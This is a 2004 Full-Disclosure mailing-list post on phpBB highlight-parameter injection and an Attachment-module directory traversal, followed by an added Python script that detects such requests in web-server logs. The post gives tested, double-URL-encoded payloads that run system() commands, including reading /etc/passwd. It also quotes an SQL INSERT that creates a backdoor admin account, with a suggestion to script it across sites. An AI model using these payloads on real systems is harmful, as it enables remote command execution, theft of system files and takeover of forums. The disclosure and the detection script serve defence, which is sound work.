Instead of just injecting MySQL commands you can use system(); to virtually execute any command you want.

Here are some examples I've already tested:

system(ls -l);
--------------
%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108))%252echr(59)%252e%2527

system(uname -a);
-----------------
%2527%252esystem(chr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252echr(59)%252e%2527

system(id);
-----------
%2527%252esystem(chr(105)%252echr(100))%252echr(59)%252e%2527

system(/bin/cat /etc/passwd);
-----------------------------
%2527%252esystem(chr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(101)%252echr(116)%252echr(99)%252echr(47)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(100))%252echr(59)%252e%2527

With the wrong permissions set, someone exploiting this vulnerability would be able to overwrite anything.

----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, November 26, 2004 2:23 PM
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal

> Phpbb: All vulnerable except 2.0.11
> Attachment module: All versions vulnerable
>
> Howdark's update opened my eyes wide with his nice exploit:
>
> Bugtraq id: 10701
>
> -----
> viewtopic.php?t=1&highlight=%2527
> -----
>
> Looking at the code I saw that it was possible to inject any type of SQL query
> with multiple char() functions.
>
> The following code can add a username with admin rights by executing this
> query:
>
> INSERT INTO
> phpbb_users(user_id,user_active,username,user_password,user_level) VALUES
> ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')
>
> And a new user with admin rights will be added to phpbb_users.
>
> *Note: we can only execute a working query if we know the table names. If not,
> we can't. So this works only with a standard installation (usually 95% of
> websites ;-)
>
> username: ze3lock
> pass: thepass
>
> The exploit can be run without being logged in and then you can have access
> with the username. So it's quite simple to make it part of a script that could
> make backdoors around the web.
>
> To make it work, just use the id of a working thread (in this case the
> thread is 30 - you can see it from the message)
>
> ------------ Attach Module ----------------
>
> In the attach module, I found a directory traversal in the "UPLOAD_DIR"
> field.
>
> This is the directory where all attachments are supposed to be uploaded.
>
> The field accepts any kind of character, so instead of 'files' you can put
> '../../' and all the attachments will be uploaded in the '../../' directory.
>
> That's really dangerous as a defacement threat.
>
> --------------- Suggestion ------------------
>
> Please upgrade to version 2.0.11 and add input validation to the UPLOAD_DIR
> field in the attach module.
>
> Zeelock
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
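As an added example that is not part of the original posts or of phpBB itself: a small Python triage script for web-server logs that reverses the double URL-encoding and the chr() chains used in the payloads above, and flags viewtopic.php requests whose highlight parameter decodes to code rather than a search word. The log lines, IP addresses, and the assumption that the value passes through exactly two decode steps (one by the web server/PHP, one by the script's own urldecode()) are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache-style, shortened); the
# addresses are documentation IPs and the requests were written for this
# example. The second line carries the system(id) payload from the post.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Nov/2004:14:23:01 +0100] "GET /forum/viewtopic.php?t=30&highlight=phpbb+security HTTP/1.1" 200 5123
192.0.2.11 - - [26/Nov/2004:14:25:44 +0100] "GET /forum/viewtopic.php?t=30&highlight=%2527%252esystem(chr(105)%252echr(100))%252echr(59)%252e%2527 HTTP/1.1" 200 5123
192.0.2.12 - - [26/Nov/2004:14:26:02 +0100] "GET /forum/viewtopic.php?t=1&highlight=%2527 HTTP/1.1" 200 4801
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')
HIGHLIGHT_RE = re.compile(r'[?&]highlight=([^&\s"]*)')
CHR_CHAIN_RE = re.compile(r'chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*', re.I)
# A search term should never carry a quote or look like a PHP call.
CODE_RE = re.compile(r"'|\b\w+\s*\(")


def decode_highlight(raw: str) -> str:
    """Undo both URL-decoding passes a %2527-style value goes through:
    one by the web server/PHP, one by the script's own urldecode() of
    the highlight parameter (assumed here)."""
    return unquote(unquote(raw))


def resolve_chr(expr: str) -> str:
    """Rewrite chr(n).chr(n)... chains into a quoted literal so an
    analyst can read the injected code at a glance."""
    def to_literal(m):
        text = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group()))
        return '"' + text.replace('"', '\\"') + '"'
    return CHR_CHAIN_RE.sub(to_literal, expr)


def find_highlight_injections(log_text: str) -> list:
    """Return (line, decoded_highlight) for every viewtopic.php request
    whose highlight value decodes to code rather than a plain word."""
    hits = []
    for line in log_text.splitlines():
        req = REQUEST_RE.search(line)
        if not req or "viewtopic.php" not in req.group(1):
            continue
        hl = HIGHLIGHT_RE.search(req.group(1))
        if not hl:
            continue
        decoded = resolve_chr(decode_highlight(hl.group(1)))
        if CODE_RE.search(decoded):
            hits.append((line, decoded))
    return hits
```

Running find_highlight_injections(SAMPLE_LOG) flags the second and third lines and shows the second decoding to '.system("id").";".' while the plain search on the first line passes.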